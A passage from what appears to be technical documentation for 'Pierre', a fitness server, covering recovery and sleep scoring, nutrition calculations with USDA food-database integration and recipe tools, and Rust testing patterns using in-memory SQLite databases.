  "tool": "calculate_fitness_score",
  "parameters": {
    "provider": "strava",
    "sleep_provider": "whoop",
    "timeframe": "month"
  }
}
Recovery adjustment factors:
| Recovery Score | Adjustment |
|---|---|
| 90-100 (Excellent) | +5% bonus |
| 70-89 (Good) | No change |
| 50-69 (Moderate) | -5% penalty |
| <50 (Poor) | -10% penalty |
analyze_training_load: When sleep_provider is specified, adds recovery context to training load analysis:
{
  "tool": "analyze_training_load",
  "parameters": {
    "provider": "strava",
    "sleep_provider": "whoop",
    "timeframe": "week"
  }
}
Response includes recovery context:
{
  "training_load": { "ctl": 65, "atl": 80, "tsb": -15 },
  "recovery_context": {
    "sleep_quality_score": 78,
    "recovery_status": "good",
    "hrv_rmssd": 55.3,
    "sleep_hours": 7.2,
    "sleep_provider": "whoop"
  }
}
Recovery Score Calculation
Pierre calculates a composite recovery score from multiple metrics.
Recovery factors:
- Sleep quality: Duration, efficiency, deep sleep percentage
- Resting heart rate: Compared to baseline (elevated RHR = fatigue)
- HRV: Heart rate variability (higher = better recovery)
- Training load: Recent TSS vs historical average
- Muscle soreness: Self-reported or inferred from performance
- Sleep debt: Cumulative sleep deficit
Recovery score formula (conceptual):
Recovery Score = (
sleep_score × 0.30 +
hrv_score × 0.25 +
rhr_score × 0.20 +
training_load_score × 0.15 +
sleep_debt_score × 0.10
) × 100
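The conceptual formula translates directly into a weighted sum. A minimal sketch, assuming each input has already been normalized to [0, 1] against the user's personal baseline (the weights are the illustrative ones above, not a confirmed production constant set):

```rust
/// Composite recovery score: weighted sum of normalized sub-scores, scaled to 0-100.
/// Weights mirror the conceptual formula above and sum to 1.0.
fn recovery_score(sleep: f64, hrv: f64, rhr: f64, training_load: f64, sleep_debt: f64) -> f64 {
    (sleep * 0.30 + hrv * 0.25 + rhr * 0.20 + training_load * 0.15 + sleep_debt * 0.10) * 100.0
}
```

Because the weights sum to 1.0, perfect sub-scores yield exactly 100, and each factor degrades the total in proportion to its weight.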
Score interpretation:
- 90-100: Fully recovered, ready for hard training
- 70-89: Good recovery, moderate-hard training OK
- 50-69: Partial recovery, easy-moderate training
- < 50: Poor recovery, rest day recommended
Sleep Quality Analysis
Pierre analyzes sleep sessions from Fitbit, Garmin, and other providers.
Sleep metrics:
- Total sleep time: Duration in bed asleep
- Sleep efficiency: Time asleep / time in bed × 100%
- Sleep stages: Awake, light, deep, REM percentages
- Sleep onset latency: Time to fall asleep
- Wake episodes: Number of awakenings
- Sleep debt: Cumulative shortfall vs target (7-9 hours)
Sleep stage targets (% of total sleep):
- Deep sleep: 15-25% (restorative, hormone release)
- REM sleep: 20-25% (memory consolidation, mental recovery)
- Light sleep: 50-60% (transition stages)
Sleep efficiency benchmarks:
- > 90%: Excellent
- 85-90%: Good
- 75-85%: Fair
- < 75%: Poor (consider sleep hygiene improvements)
HRV (Heart Rate Variability)
HRV measures nervous system recovery via beat-to-beat timing variation.
HRV metrics:
- RMSSD: Root mean square of successive differences (ms)
- SDNN: Standard deviation of NN intervals (ms)
- pNN50: Percentage of successive intervals > 50ms different
HRV interpretation (RMSSD):
- > 100ms: Excellent recovery
- 60-100ms: Good recovery
- 40-60ms: Moderate recovery
- 20-40ms: Poor recovery
- < 20ms: Very poor recovery, rest day needed
HRV trends matter more than absolute values: Compare to personal baseline rather than population norms.
Overtraining Detection
Pierre monitors for overtraining syndrome indicators.
Overtraining warning signs:
- Elevated resting heart rate: +5-10 BPM above baseline for 3+ days
- Decreased HRV: > 20% below baseline for consecutive days
- Excessive TSB: Training Stress Balance < -30 for extended period
- Performance decline: Slower paces at same effort level
- Persistent fatigue: Low recovery scores despite rest
- Sleep disturbances: Difficulty falling/staying asleep
- Mood changes: Irritability, loss of motivation
Overtraining prevention:
IF resting_hr > baseline + 8 AND hrv < baseline × 0.8 AND tsb < -30:
RECOMMEND: 2-3 rest days
ALERT: Overtraining risk detected
Rest Day Suggestions
Pierre suggests rest days based on accumulated fatigue.
Rest day algorithm (conceptual):
fn suggest_rest_day(
    recovery_score: f64,
    tsb: f64,
    consecutive_hard_days: u32,
    hrv_trend: f64,
) -> RestDaySuggestion {
    // Critical indicators
    if recovery_score < 30.0 || tsb < -40.0 {
        return RestDaySuggestion::Immediate;
    }
    // High fatigue
    if recovery_score < 50.0 && consecutive_hard_days >= 3 {
        return RestDaySuggestion::Soon;
    }
    // Preventive rest
    if consecutive_hard_days >= 6 || tsb < -20.0 {
        return RestDaySuggestion::NextDay;
    }
    RestDaySuggestion::None
}
Rest day types:
- Complete rest: No training, focus on sleep/nutrition
- Active recovery: Easy 20-30 min at < 60% max HR
- Light cross-training: Different sport, low intensity
Training Load vs Recovery Balance
Pierre tracks the balance between training stress and recovery.
Optimal balance indicators:
- TSB: -10 to +10 (productive training without excessive fatigue)
- Weekly TSS: Consistent with 5-10% week-over-week growth
- Recovery days: 1-2 per week for most athletes
- Hard:Easy ratio: 1:2 or 1:3 (one hard day per 2-3 easy days)
Periodization support:
Build Phase: TSB -10 to -20, weekly TSS +5 to +10%
Recovery Week: TSB +10 to +20, weekly TSS -40 to -50%
Peak Phase: TSB +15 to +25, weekly TSS -30%
Race Day: TSB +20 to +30 (fresh and rested)
Sleep Optimization Recommendations
Pierre provides personalized sleep recommendations.
Sleep hygiene tips:
- Consistent schedule: Same bedtime/wake time daily (±30 min)
- Sleep environment: Cool (60-67°F), dark, quiet
- Pre-bed routine: Wind down 30-60 min before sleep
- Limit caffeine: No caffeine 6+ hours before bed
- Limit screens: Blue light suppresses melatonin (avoid 1-2hr before bed)
Sleep timing for athletes:
- After hard training: Need 1-2 hours extra sleep for recovery
- Before race/key workout: 8-9 hours recommended
- Naps: 20-30 min power naps OK, avoid long naps (>90 min)
Key Takeaways
- Recovery score: Composite metric from sleep, HRV, RHR, training load, and sleep debt.
- Sleep stages: Deep sleep (15-25%), REM (20-25%), light (50-60%) for optimal recovery.
- HRV: Beat-to-beat variation indicates nervous system recovery (higher = better).
- Overtraining detection: Elevated RHR + decreased HRV + negative TSB = warning signs.
- Rest day algorithm: Considers recovery score, TSB, consecutive hard days, HRV trends.
- TSB sweet spot: -10 to +10 for sustainable training without overreaching.
- Sleep efficiency: Time asleep / time in bed > 85% indicates good sleep quality.
- Personal baselines: Compare metrics to individual baseline, not population averages.
- Periodization: Planned recovery weeks (TSB +10 to +20) prevent cumulative fatigue.
- Holistic approach: Balance training load, recovery, sleep, nutrition for optimal adaptation.
Next Chapter: Chapter 22: Nutrition System & USDA Integration - Learn how Pierre calculates daily nutrition needs, integrates with the USDA food database, analyzes meal nutrition, and provides nutrient timing recommendations.
Chapter 22: Nutrition System & USDA Integration
This chapter covers Pierre’s nutrition system including daily calorie/macro calculations, USDA food database integration, meal analysis, and nutrient timing for athletes. You’ll learn about energy expenditure estimation, protein requirements, and post-workout nutrition windows.
Daily Nutrition Calculation
Pierre calculates personalized daily nutrition needs based on training load.
Total Daily Energy Expenditure (TDEE):
TDEE = BMR + Activity Calories + Exercise Calories + TEF
Where:
- BMR (Basal Metabolic Rate): Resting energy expenditure
- Activity Calories: Daily lifestyle activity
- Exercise Calories: Planned training
- TEF (Thermic Effect of Food): Digestion cost (~10% of intake)
BMR calculation (Mifflin-St Jeor equation):
Men: BMR = 10 × weight_kg + 6.25 × height_cm - 5 × age + 5
Women: BMR = 10 × weight_kg + 6.25 × height_cm - 5 × age - 161
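The two equations differ only in their final constant, so a single function with a sex flag covers both. A minimal sketch:

```rust
/// Mifflin-St Jeor BMR in kcal/day; `is_male` selects the +5 / -161 constant.
fn bmr_mifflin_st_jeor(weight_kg: f64, height_cm: f64, age_years: f64, is_male: bool) -> f64 {
    let base = 10.0 * weight_kg + 6.25 * height_cm - 5.0 * age_years;
    if is_male { base + 5.0 } else { base - 161.0 }
}
```

For a hypothetical 70 kg, 175 cm, 30-year-old man this gives 700 + 1093.75 − 150 + 5 = 1648.75 kcal/day, which the activity multipliers below then scale into TDEE.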
Activity multipliers:
- Sedentary: 1.2 (desk job, minimal activity)
- Lightly active: 1.375 (light exercise 1-3 days/week)
- Moderately active: 1.55 (moderate exercise 3-5 days/week)
- Very active: 1.725 (hard exercise 6-7 days/week)
- Extremely active: 1.9 (athlete, 2x/day training)
Exercise calories (from activity data):
Calories = TSS × 1.0 (approximation: 1 TSS ≈ 1 kcal for cycling)
Or use heart rate-based:
Calories = duration_min × (0.6309 × HR + 0.1988 × weight_kg + 0.2017 × age - 55.0969) / 4.184
Macronutrient Targets
Pierre recommends macros based on sport and training phase.
Protein requirements (g/kg body weight/day):
- Endurance athletes: 1.2-1.6 g/kg
- Strength athletes: 1.6-2.2 g/kg
- Ultra-endurance: 1.6-2.0 g/kg
- Recovery day: 1.2-1.4 g/kg
Carbohydrate requirements (g/kg/day):
- Low intensity: 3-5 g/kg
- Moderate training (1hr/day): 5-7 g/kg
- High volume (1-3hr/day): 6-10 g/kg
- Extreme volume (4-5hr/day): 8-12 g/kg
Fat requirements:
- Minimum: 0.8-1.0 g/kg (hormone production, vitamin absorption)
- Typical: 20-35% of total calories
- Low-carb athletes: Up to 60-70% of calories (fat-adapted)
Example calculation (70kg cyclist, moderate training):
TDEE: 2800 kcal
Protein: 70kg × 1.4 g/kg = 98g (392 kcal)
Carbs: 70kg × 6 g/kg = 420g (1680 kcal)
Fat: Remaining = (2800 - 392 - 1680) / 9 = 81g (728 kcal)
Macros: 14% protein / 60% carbs / 26% fat
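The fat target in that example is just what is left of the energy budget after protein and carbs are fixed. A sketch of that back-calculation (4 kcal/g for protein and carbs, 9 kcal/g for fat):

```rust
/// Fat grams remaining in the energy budget after protein and carb targets are set.
/// Protein and carbs contribute 4 kcal/g; fat contributes 9 kcal/g.
fn remaining_fat_g(tdee_kcal: f64, protein_g: f64, carbs_g: f64) -> f64 {
    (tdee_kcal - 4.0 * protein_g - 4.0 * carbs_g) / 9.0
}
```

With the example's numbers (2800 kcal TDEE, 98 g protein, 420 g carbs) this returns ≈ 80.9 g, matching the 81 g figure above after rounding.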
USDA FoodData Central Integration
Pierre integrates with USDA’s food database for nutrition data.
USDA API endpoints:
- /foods/search: Search food database
- /food/{fdcId}: Get detailed nutrition data
- /foods/list: Browse food categories
Food search (conceptual):
async fn search_food(query: &str) -> Result<Vec<FoodSearchResult>> {
    let url = format!(
        "https://api.nal.usda.gov/fdc/v1/foods/search?query={}&api_key={}",
        query, api_key
    );
    let response: UsdaSearchResponse = client.get(url).send().await?.json().await?;
    Ok(response
        .foods
        .into_iter()
        .map(|food| FoodSearchResult {
            fdc_id: food.fdc_id,
            description: food.description,
            brand_name: food.brand_name,
            serving_size: food.serving_size,
            serving_unit: food.serving_unit,
        })
        .collect())
}
Food nutrition details:
{
  "fdcId": 171705,
  "description": "Banana, raw",
  "foodNutrients": [
    {
      "nutrientName": "Protein",
      "value": 1.09,
      "unitName": "G"
    },
    {
      "nutrientName": "Total lipid (fat)",
      "value": 0.33,
      "unitName": "G"
    },
    {
      "nutrientName": "Carbohydrate, by difference",
      "value": 22.84,
      "unitName": "G"
    },
    {
      "nutrientName": "Energy",
      "value": 89,
      "unitName": "KCAL"
    }
  ]
}
Meal Nutrition Analysis
Pierre analyzes complete meals from multiple foods.
Meal analysis input:
{
  "foods": [
    {"fdc_id": 171705, "servings": 1, "description": "Banana"},
    {"fdc_id": 174608, "servings": 2, "description": "Peanut butter, 2 tbsp"},
    {"fdc_id": 173757, "servings": 2, "description": "Whole wheat bread, 2 slices"}
  ]
}
Meal analysis output:
{
  "total_calories": 450,
  "total_protein_g": 16,
  "total_carbs_g": 58,
  "total_fat_g": 18,
  "macro_percentages": {
    "protein": 14,
    "carbs": 52,
    "fat": 34
  },
  "micronutrients": {
    "vitamin_b6_mg": 0.8,
    "potassium_mg": 850,
    "fiber_g": 10
  }
}
Nutrient Timing
Pierre provides timing recommendations for optimal performance and recovery.
Pre-workout nutrition (1-3 hours before):
- Carbs: 1-4 g/kg body weight (fuel glycogen stores)
- Protein: 0.15-0.25 g/kg (reduce muscle breakdown)
- Fat: Minimal (slows digestion)
- Example: Oatmeal (60g) + banana + protein shake
During workout (>90 minutes):
- Carbs: 30-60 g/hour (maintain blood glucose)
- Electrolytes: Sodium 500-700 mg/L (prevent hyponatremia)
- Fluid: 400-800 ml/hour (depends on sweat rate)
Post-workout nutrition (within 30-60 min):
- Carbs: 1.0-1.2 g/kg (replenish glycogen)
- Protein: 0.25-0.3 g/kg (muscle protein synthesis)
- Ratio: 3:1 to 4:1 carb:protein optimal
- Example (70kg athlete): 70-84g carbs + 18-21g protein
Anabolic window:
- 0-2 hours post-exercise: Glycogen synthesis rate 2-3× higher
- Protein synthesis: Elevated 24-48 hours (not just 30min window)
- Practical: Eat within 2 hours, total daily intake matters most
Cross-Provider Intensity Inference
The get_nutrient_timing tool supports cross-provider activity data to auto-infer workout intensity:
{
  "tool": "get_nutrient_timing",
  "parameters": {
    "weight_kg": 70,
    "daily_protein_g": 140,
    "activity_provider": "strava",
    "days_back": 7
  }
}
How intensity is inferred:
- Fetches recent activities from the specified provider
- Analyzes training volume (hours/day) and heart rate patterns
- Returns intensity_source: "inferred" in the response
Inference thresholds:
| Intensity | Training Volume | Avg Heart Rate |
|---|---|---|
| High | >2 hours/day | >150 bpm |
| Moderate | 1-2 hours/day | 130-150 bpm |
| Low | <1 hour/day | <130 bpm |
Fallback behavior: If the activity fetch fails and an explicit workout_intensity was also provided, the tool falls back to the explicit value. If neither source is available, it returns an error.
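The thresholds table gives per-signal cutoffs but does not say how volume and heart rate combine. A sketch under one plausible reading — both signals must agree for the extreme categories, everything else is moderate; the function is illustrative, not Pierre's actual inference code:

```rust
/// One plausible reading of the inference table above. Pierre's real logic
/// may weight the two signals differently; this is an illustrative sketch.
fn infer_intensity(hours_per_day: f64, avg_hr_bpm: f64) -> &'static str {
    if hours_per_day > 2.0 && avg_hr_bpm > 150.0 {
        "high" // both volume and heart rate exceed the high thresholds
    } else if hours_per_day < 1.0 && avg_hr_bpm < 130.0 {
        "low" // both signals below the low thresholds
    } else {
        "moderate" // mixed or mid-range signals
    }
}

fn main() {
    assert_eq!(infer_intensity(2.5, 160.0), "high");
    assert_eq!(infer_intensity(1.5, 140.0), "moderate");
    assert_eq!(infer_intensity(0.5, 120.0), "low");
    println!("intensity inference sketch OK");
}
```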
Carbohydrate Periodization
Pierre adjusts carb intake based on training intensity.
Daily carb adjustment:
Rest day: 3-4 g/kg (maintenance)
Easy day: 4-5 g/kg (light recovery)
Moderate day: 5-7 g/kg (typical training)
Hard day: 7-9 g/kg (high intensity)
Race day: 8-12 g/kg (maximum fueling)
Benefits of periodization:
- Metabolic flexibility: Trains fat oxidation on low-carb days
- Glycogen supercompensation: Maximizes storage for key workouts
- Body composition: Reduces excess carbs on easy days
- Performance: Fuels hard sessions adequately
Example week (70kg cyclist):
Monday (rest): 70kg × 3g = 210g carbs
Tuesday (easy): 70kg × 5g = 350g carbs
Wednesday (hard): 70kg × 8g = 560g carbs
Thursday (moderate): 70kg × 6g = 420g carbs
Friday (easy): 70kg × 5g = 350g carbs
Saturday (long): 70kg × 9g = 630g carbs
Sunday (race): 70kg × 10g = 700g carbs
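Each line of the example week is just body weight times a per-day g/kg target. A minimal sketch using the values from this week (the DayType enum and helper are illustrative, not Pierre's API):

```rust
/// Illustrative day categories; values match the example week above.
#[derive(Clone, Copy)]
enum DayType { Rest, Easy, Moderate, Hard, Race }

/// Daily carbohydrate target in grams: g/kg target scaled by body weight.
fn carbs_g(day: DayType, weight_kg: f64) -> f64 {
    let g_per_kg = match day {
        DayType::Rest => 3.0,
        DayType::Easy => 5.0,
        DayType::Moderate => 6.0,
        DayType::Hard => 8.0,
        DayType::Race => 10.0,
    };
    g_per_kg * weight_kg
}

fn main() {
    // Monday (rest) and Sunday (race) from the 70 kg cyclist example.
    println!("rest: {} g, race: {} g",
        carbs_g(DayType::Rest, 70.0),
        carbs_g(DayType::Race, 70.0));
}
```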
Hydration Recommendations
Pierre calculates sweat rate and hydration needs.
Sweat rate calculation:
Sweat Rate (L/hr) = (Pre-Weight - Post-Weight + Fluid Consumed - Urine Output) / Duration
Example:
Pre: 70.0 kg
Post: 69.2 kg
Fluid: 0.5 L
Duration: 1 hour
Sweat Rate = (70.0 - 69.2 + 0.5 - 0) / 1 = 1.3 L/hr
Hydration guidelines:
- Daily baseline: 30-35 ml/kg body weight
- Pre-exercise: 5-7 ml/kg 2-4 hours before
- During exercise: Replace 60-80% of sweat losses
- Post-exercise: 150% of fluid deficit (1.5L for each kg lost)
Electrolyte needs (sodium):
- Low sweaters: 300-500 mg/L
- Average: 500-800 mg/L
- Heavy/salty sweaters: 800-1200 mg/L
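Both the sweat-rate formula and the 150% rehydration guideline reduce to a couple of lines of arithmetic. A sketch with illustrative function names, treating 1 kg of weight loss as 1 L of fluid:

```rust
/// Sweat rate per the formula above: weights in kg (1 kg lost ~ 1 L),
/// fluids in litres, duration in hours. Illustrative helpers, not Pierre's API.
fn sweat_rate_l_per_hr(pre_kg: f64, post_kg: f64, fluid_l: f64, urine_l: f64, hours: f64) -> f64 {
    (pre_kg - post_kg + fluid_l - urine_l) / hours
}

/// Post-exercise target: replace 150% of the fluid deficit.
fn rehydration_target_l(pre_kg: f64, post_kg: f64) -> f64 {
    1.5 * (pre_kg - post_kg)
}

fn main() {
    // The worked example above: 70.0 kg pre, 69.2 kg post, 0.5 L consumed, 1 hour.
    let rate = sweat_rate_l_per_hr(70.0, 69.2, 0.5, 0.0, 1.0);
    println!("sweat rate: {rate:.1} L/hr"); // 1.3 L/hr
    println!("rehydrate: {:.1} L", rehydration_target_l(70.0, 69.2)); // 1.2 L
}
```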
Recipe Management (Combat des Chefs)
Pierre provides training-aware recipe management using the “Combat des Chefs” architecture:
- LLM clients generate recipes (cost-efficient, creative)
- Pierre validates nutrition via USDA (accurate, authoritative)
- Per-user storage (private recipe collections)
Meal Timing & Macro Targets
Recipes are categorized by training timing with specific macro distributions:
| Meal Timing | Protein | Carbs | Fat | Use Case |
|---|---|---|---|---|
| pre_training | 20% | 55% | 25% | 1-3 hours before workout |
| post_training | 30% | 45% | 25% | Within 60 min after workout |
| rest_day | 30% | 35% | 35% | Recovery days, lower carb |
| general | 25% | 45% | 30% | Balanced everyday meals |
Recipe Workflow
Step 1: Get Constraints
{
"tool": "get_recipe_constraints",
"parameters": {
"meal_timing": "post_training",
"target_calories": 600
}
}
Returns macro targets, guidelines, and example ingredients for the LLM to use.
Step 2: LLM Generates Recipe
The AI assistant creates a recipe based on constraints and user preferences.
Step 3: Validate with Pierre
{
"tool": "validate_recipe",
"parameters": {
"name": "Recovery Protein Bowl",
"meal_timing": "post_training",
"target_calories": 600,
"ingredients": [
{"name": "chicken breast", "quantity": 200, "unit": "grams"},
{"name": "brown rice", "quantity": 1, "unit": "cup"},
{"name": "broccoli", "quantity": 150, "unit": "grams"}
]
}
}
Pierre validates nutrition via USDA and returns:
- Actual calories and macros
- Compliance score vs targets
- Suggestions for improvements
Step 4: Save if Valid
{
"tool": "save_recipe",
"parameters": {
"name": "Recovery Protein Bowl",
"meal_timing": "post_training",
"ingredients": [...],
"instructions": ["Cook rice", "Grill chicken", "Steam broccoli", "Combine and serve"],
"tags": ["high-protein", "post-workout", "quick"]
}
}
Unit Conversion
Pierre automatically converts common units to grams for accurate nutrition lookup:
| Category | Units | Example Conversion |
|---|---|---|
| Weight | oz, lb, kg | 1 oz → 28.35g |
| Volume | cups, tbsp, tsp, ml | 1 cup → ~240g (varies by ingredient) |
| Count | pieces, whole | 1 banana → ~118g |
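A conversion layer like this can be sketched as a lookup from unit to grams per unit. The values below mirror the table above but are generic defaults — real conversions for volume and count units need per-ingredient densities, and Pierre's actual tables may differ:

```rust
/// Convert a quantity in a common unit to grams. Volume units assume a
/// water-like density (~1 g/ml); real systems use per-ingredient densities.
/// Illustrative sketch, not Pierre's actual conversion code.
fn to_grams(quantity: f64, unit: &str) -> Option<f64> {
    let grams_per_unit = match unit {
        "g" | "grams" => 1.0,
        "oz" => 28.35,
        "lb" => 453.6,
        "kg" => 1000.0,
        "cup" => 240.0, // approximate; varies by ingredient
        "tbsp" => 15.0,
        "tsp" => 5.0,
        "ml" => 1.0,
        _ => return None, // unknown units need ingredient-specific handling
    };
    Some(quantity * grams_per_unit)
}

fn main() {
    println!("1 oz = {:?} g", to_grams(1.0, "oz"));
    println!("2 cups = {:?} g", to_grams(2.0, "cup"));
    println!("1 slice = {:?}", to_grams(1.0, "slice")); // unknown unit -> None
}
```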
Recipe Tools Summary
| Tool | Purpose |
|---|---|
| get_recipe_constraints | Get macro targets for meal timing |
| validate_recipe | Validate nutrition via USDA |
| save_recipe | Store in user’s collection |
| list_recipes | Browse saved recipes |
| get_recipe | Retrieve specific recipe |
| delete_recipe | Remove from collection |
| search_recipes | Find by name/ingredients/tags |
Key Takeaways
- TDEE calculation: BMR + activity + exercise + TEF determines daily calorie needs.
- Protein: 1.2-2.2 g/kg depending on sport and training phase.
- Carbs: 3-12 g/kg based on training volume and intensity.
- USDA integration: 800,000+ foods with detailed nutrition data via FoodData Central API.
- Meal analysis: Sum nutrition from multiple foods for complete meal breakdown.
- Nutrient timing: Pre (1-3 hr), during (>90 min), post (30-60 min) windows optimize performance.
- Carb periodization: Match carb intake to training intensity for metabolic flexibility.
- Sweat rate: Measure weight before/after to calculate individual fluid needs.
- Post-workout ratio: 3:1 to 4:1 carb:protein ratio optimizes recovery.
- Total daily intake: 24-hour totals matter more than strict timing windows.
- Combat des Chefs: LLM generates recipes, Pierre validates via USDA for accuracy.
- Meal timing macros: Pre-training (high carb), post-training (high protein), rest day (balanced).
Detailed Methodology Reference
For comprehensive technical documentation of all nutrition algorithms and USDA integration, see the Nutrition Methodology Document in the Pierre source repository.
This detailed reference document covers:
| Topic | Description |
|---|---|
| BMR Calculation | Mifflin-St Jeor equation with step-by-step derivation |
| TDEE Calculation | Activity multipliers, TEF, exercise adjustments |
| Macro Ratios | Sport-specific protein/carb/fat recommendations |
| USDA Integration | FoodData Central API, search patterns, caching |
| Portion Estimation | Unit conversion tables, ingredient density |
| Meal Analysis | Aggregation algorithms, nutrient completeness |
| Timing Windows | Pre/during/post exercise optimization |
| Hydration | Sweat rate calculation, electrolyte needs |
| Recipe Validation | Compliance scoring, macro target matching |
| Edge Cases | Missing nutrients, unknown foods, fallbacks |
For implementers: The methodology document includes complete formulas, USDA API examples, and validation rules for every nutrition tool in Pierre.
End of Part VI: Tools & Intelligence
You’ve completed the tools and intelligence section. You now understand:
- All 47 MCP tools and their usage (Chapter 19)
- Sports science algorithms (Chapter 20)
- Recovery and sleep analysis (Chapter 21)
- Nutrition system, USDA integration, and recipe management (Chapter 22)
Next Chapter: Chapter 23: Testing Framework - Begin Part VII by learning about Pierre’s testing infrastructure including synthetic data generation, E2E tests, tools-to-types validation, and test organization.
Chapter 23: Testing Framework - Comprehensive Testing Patterns
This chapter covers Pierre’s testing infrastructure including database testing, integration patterns, synthetic data generation, async testing, error testing, and test organization best practices.
Database Testing Patterns
Pierre uses in-memory SQLite databases for fast, isolated tests without external dependencies.
In-Memory Database Setup
Source: tests/database_memory_test.rs:18-71
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_memory_database_no_physical_files() -> Result<()> {
let encryption_key = generate_encryption_key().to_vec();
// Create in-memory database - NO physical files
let database = Database::new("sqlite::memory:", encryption_key).await?;
// Verify no physical files are created
let current_dir = std::env::current_dir()?;
let entries = fs::read_dir(&current_dir)?;
for entry in entries {
let entry = entry?;
let filename = entry.file_name();
let filename_str = filename.to_string_lossy();
assert!(
!filename_str.starts_with(":memory:test_"),
"Found physical file that should be in-memory: {filename_str}"
);
}
// Test basic database functionality
let user = User::new(
"test@memory.test".to_owned(),
"password_hash".to_owned(),
Some("Memory Test User".to_owned()),
);
let user_id = database.create_user(&user).await?;
let retrieved_user = database.get_user(user_id).await?.unwrap();
assert_eq!(retrieved_user.email, "test@memory.test");
assert_eq!(retrieved_user.display_name, Some("Memory Test User".to_owned()));
Ok(())
}
}
Benefits:
- Fast: No disk I/O, tests run in milliseconds
- Isolated: Each test gets independent database
- No cleanup: Memory automatically freed after test
- Deterministic: No race conditions from shared state
Database Isolation Testing
Source: tests/database_memory_test.rs:74-126
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_multiple_memory_databases_isolated() -> Result<()> {
let encryption_key1 = generate_encryption_key().to_vec();
let encryption_key2 = generate_encryption_key().to_vec();
// Create two separate in-memory databases
let database1 = Database::new("sqlite::memory:", encryption_key1).await?;
let database2 = Database::new("sqlite::memory:", encryption_key2).await?;
// Create users in each database
let user1 = User::new(
"user1@test.com".to_owned(),
"hash1".to_owned(),
Some("User 1".to_owned()),
);
let user2 = User::new(
"user2@test.com".to_owned(),
"hash2".to_owned(),
Some("User 2".to_owned()),
);
let user1_id = database1.create_user(&user1).await?;
let user2_id = database2.create_user(&user2).await?;
// Verify isolation - each database only contains its own user
assert!(database1.get_user(user1_id).await?.is_some());
assert!(database2.get_user(user2_id).await?.is_some());
// User1 should not exist in database2 and vice versa
assert!(database2.get_user(user1_id).await?.is_none());
assert!(database1.get_user(user2_id).await?.is_none());
Ok(())
}
}
Why isolation matters: Tests can run in parallel without interfering. Each test gets clean database state.
Test Fixture Helpers
Common test fixtures (tests/common.rs - conceptual):
#![allow(unused)]
fn main() {
/// Create test database with migrations applied
pub async fn create_test_database() -> Result<Arc<Database>> {
let encryption_key = generate_encryption_key().to_vec();
let database = Database::new("sqlite::memory:", encryption_key).await?;
database.migrate().await?;
Ok(Arc::new(database))
}
/// Create test auth manager with default config
pub fn create_test_auth_manager() -> Arc<AuthManager> {
Arc::new(AuthManager::new())
}
/// Create test cache
pub async fn create_test_cache() -> Result<Arc<Cache>> {
Ok(Arc::new(Cache::new()))
}
/// Initialize server config from environment
pub fn init_server_config() {
std::env::set_var("JWT_SECRET", "test_jwt_secret");
std::env::set_var("ENCRYPTION_KEY", "test_encryption_key_32_bytes_long");
}
}
Pattern: Centralized test helpers reduce duplication and ensure consistent test setup.
Integration Testing Patterns
Pierre tests MCP protocol handlers using structured JSON-RPC requests.
MCP Request Helpers
Source: tests/mcp_protocol_comprehensive_test.rs:27-47
#![allow(unused)]
fn main() {
/// Test helper to create MCP request
fn create_mcp_request(method: &str, params: Option<&Value>, id: Option<Value>) -> Value {
json!({
"jsonrpc": "2.0",
"method": method,
"params": params,
"id": id.unwrap_or_else(|| json!(1))
})
}
/// Test helper to create authenticated MCP request
fn create_auth_mcp_request(
method: &str,
params: Option<&Value>,
token: &str,
id: Option<Value>,
) -> Value {
let mut request = create_mcp_request(method, params, id);
request["auth_token"] = json!(token);
request
}
}
MCP Protocol Integration Test
Source: tests/mcp_protocol_comprehensive_test.rs:49-77
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_mcp_initialize_request() -> Result<()> {
common::init_server_config();
let database = common::create_test_database().await?;
let auth_manager = common::create_test_auth_manager();
let config = Arc::new(ServerConfig::from_env()?);
let cache = common::create_test_cache().await.unwrap();
let resources = Arc::new(ServerResources::new(
(*database).clone(),
(*auth_manager).clone(),
TEST_JWT_SECRET,
config,
cache,
2048, // Use 2048-bit RSA keys for faster test execution
Some(common::get_shared_test_jwks()),
));
let server = MultiTenantMcpServer::new(resources);
// Test initialize request
let _request = create_mcp_request("initialize", None, Some(json!("init-1")));
// Validate server is properly initialized
let _ = server.database();
Ok(())
}
}
Pattern: Integration tests validate component interactions (server → database → auth) without mocking.
Authentication Testing
Source: tests/mcp_protocol_comprehensive_test.rs:137-175
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_mcp_authenticate_request() -> Result<()> {
common::init_server_config();
let database = common::create_test_database().await?;
let auth_manager = common::create_test_auth_manager();
let config = Arc::new(ServerConfig::from_env()?);
let cache = common::create_test_cache().await.unwrap();
let resources = Arc::new(ServerResources::new(
(*database).clone(),
(*auth_manager).clone(),
TEST_JWT_SECRET,
config,
cache,
2048,
Some(common::get_shared_test_jwks()),
));
let _server = MultiTenantMcpServer::new(resources);
// Create test user
let user = User::new(
"mcp_auth@example.com".to_owned(),
"password123".to_owned(),
Some("MCP Auth Test".to_owned()),
);
database.create_user(&user).await?;
// Test authenticate request format
let auth_params = json!({
"email": "mcp_auth@example.com",
"password": "password123"
});
let request = create_mcp_request("authenticate", Some(&auth_params), Some(json!("auth-1")));
assert_eq!(request["method"], "authenticate");
assert_eq!(request["params"]["email"], "mcp_auth@example.com");
Ok(())
}
}
Pattern: Create test user → Construct auth request → Validate request structure.
Async Testing Patterns
Pierre uses #[tokio::test] for async test execution.
Async Test Basics
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_async_database_operation() -> Result<()> {
let database = create_test_database().await?;
// Async operations work naturally
let user = User::new("test@example.com".to_owned(), "hash".to_owned(), None);
let user_id = database.create_user(&user).await?;
// Multiple awaits in sequence
let retrieved = database.get_user(user_id).await?;
assert!(retrieved.is_some());
Ok(())
}
}
tokio::test features:
- Multi-threaded runtime: Tests run on tokio runtime
- Async/await support: Natural async syntax
- Automatic cleanup: Runtime shut down after test
- Error propagation: Result<()> with ? operator
Concurrent Async Operations
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_concurrent_database_writes() -> Result<()> {
let database = create_test_database().await?;
// Spawn multiple concurrent tasks
let handles: Vec<_> = (0..10)
.map(|i| {
let db = database.clone();
tokio::spawn(async move {
let user = User::new(
format!("user{}@test.com", i),
"hash".to_owned(),
None,
);
db.create_user(&user).await
})
})
.collect();
// Wait for all tasks to complete
for handle in handles {
handle.await??;
}
Ok(())
}
}
Pattern: Test concurrent behavior with tokio::spawn to validate thread safety.
Synthetic Data Generation
Pierre uses deterministic synthetic data for reproducible tests (covered in Chapter 14).
Key benefits:
- No OAuth required: Tests run without external API dependencies
